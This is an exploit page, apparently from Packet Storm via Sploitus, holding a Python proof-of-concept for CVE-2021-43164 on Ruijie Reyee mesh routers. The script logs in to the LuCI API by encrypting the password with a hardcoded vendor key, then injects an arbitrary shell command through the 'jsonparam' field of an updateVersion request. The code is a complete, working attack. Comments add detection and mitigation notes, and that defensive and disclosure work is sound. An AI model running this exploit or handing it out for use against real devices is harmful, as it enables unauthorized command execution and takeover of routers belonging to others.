## https://sploitus.com/exploit?id=PACKETSTORM:167099
# Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)  
# Google Dork: None  
# Date: November 1, 2021  
# Exploit Author: Minh Khoa of VSEC  
# Vendor Homepage: https://ruijienetworks.com  
# Software Link: https://www.ruijienetworks.com/resources/products/1896-1900  
# Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55  
# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO  
# CVE: CVE-2021-43164  
  
#!/usr/bin/python3  
  
import os  
import sys  
import time  
import requests  
import json  
  
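def enc(PASS):
    """Return the base64 AES-256-CBC form of *PASS* that the login request sends.

    The passphrase is the fixed string embedded below and the key is derived
    with MD5 (``-md md5``). Because that passphrase ships inside this script,
    the output can be reversed by anyone who holds it: treat it as encoding
    of the password, not as protection of it. The login request in this file
    is also sent over plain ``http://``.

    Args:
        PASS: the account password; it is formatted to text and followed by a
            newline, matching what ``echo`` fed to openssl originally.

    Returns:
        The stripped base64 text printed by ``openssl enc``, or ``""`` when
        openssl cannot be started or prints nothing.
    """
    # Function-scope import so the file's import block needs no change.
    import subprocess

    key = "RjYkhwzx$2018!"
    # An argument list instead of a formatted shell string: a quote,
    # backslash or `$` in the password is no longer parsed by the local
    # shell, so it can neither break the command nor run anything locally.
    # NOTE(review): the passphrase is still passed with -k on the command
    # line, where local process listings can show it.
    argv = ["openssl", "enc", "-aes-256-cbc", "-a", "-k", key, "-md", "md5"]
    try:
        proc = subprocess.run(
            argv,
            input="{}\n".format(PASS).encode(),
            stdout=subprocess.PIPE,
            stderr=subprocess.DEVNULL,  # same as the original 2>/dev/null
            check=False,
        )
    except OSError:
        # openssl missing or not executable: keep the original empty result.
        return ""
    return proc.stdout.decode().strip()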
  
# Command-line contract: <target> <user> <pass> <command>.
# Valid credentials are required; the header of this file labels the issue
# as authenticated. With fewer than four arguments, print the usage text
# and exit with status 1.
if len(sys.argv) < 5:
    for usage_line in (
        "CVE-2021-43164 PoC",
        "Usage: python3 exploit.py <target> <user> <pass> <command>",
        "Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'",
    ):
        print(usage_line)
    sys.exit(1)

# Arguments beyond the fourth are ignored.
TARGET, USER, PASS, COMMAND = sys.argv[1:5]
  
# Step 1: log in to the device's LuCI API and obtain a session id.
# The request goes over plain HTTP, so the username and the encoded
# password are visible to anything on the network path.
endpoint = f"http://{TARGET}/cgi-bin/luci/api/auth"

login_params = {
    "username": USER,
    "password": enc(PASS),  # encoded with the fixed key inside enc()
    "encry": True,
    "time": int(time.time()),
    "limit": False,
}
payload = {"method": "login", "params": login_params}

r = requests.post(endpoint, json=payload)
# The session id is read from data.sid of the JSON reply. A failed login
# or a non-JSON body raises here, since nothing checks the response first.
login_reply = json.loads(r.text)
sid = login_reply["data"]["sid"]
  
# Step 2: call updateVersion on the wireless API using the session id.
#
# The jsonparam value opens with `';` and closes with ` #`, i.e. a quote
# plus command separator in front of the operator's text and a shell
# comment marker behind it. This implies the firmware places jsonparam
# inside a single-quoted shell command without escaping it. That is an
# inference from the payload shape; confirm against the vendor advisory for
# CVE-2021-43164.
#
# Defender notes:
#   * Detection: POSTs to /cgi-bin/luci/api/wireless with method
#     "updateVersion" whose jsonparam contains a quote, `;` or `#`, usually
#     shortly after a login to /cgi-bin/luci/api/auth from the same client.
#   * Mitigation: install vendor-fixed firmware on the versions listed in
#     the header of this file, keep the management interface off untrusted
#     networks, and replace default or shared administrator passwords,
#     since the request only works with a valid session.
endpoint = f"http://{TARGET}/cgi-bin/luci/api/wireless?auth={sid}"

injected_value = f"'; {COMMAND} #"
payload = {
    "method": "updateVersion",
    "params": {"jsonparam": injected_value},
}

r = requests.post(endpoint, json=payload)
# Print the raw response body exactly as the device returned it.
print(r.text)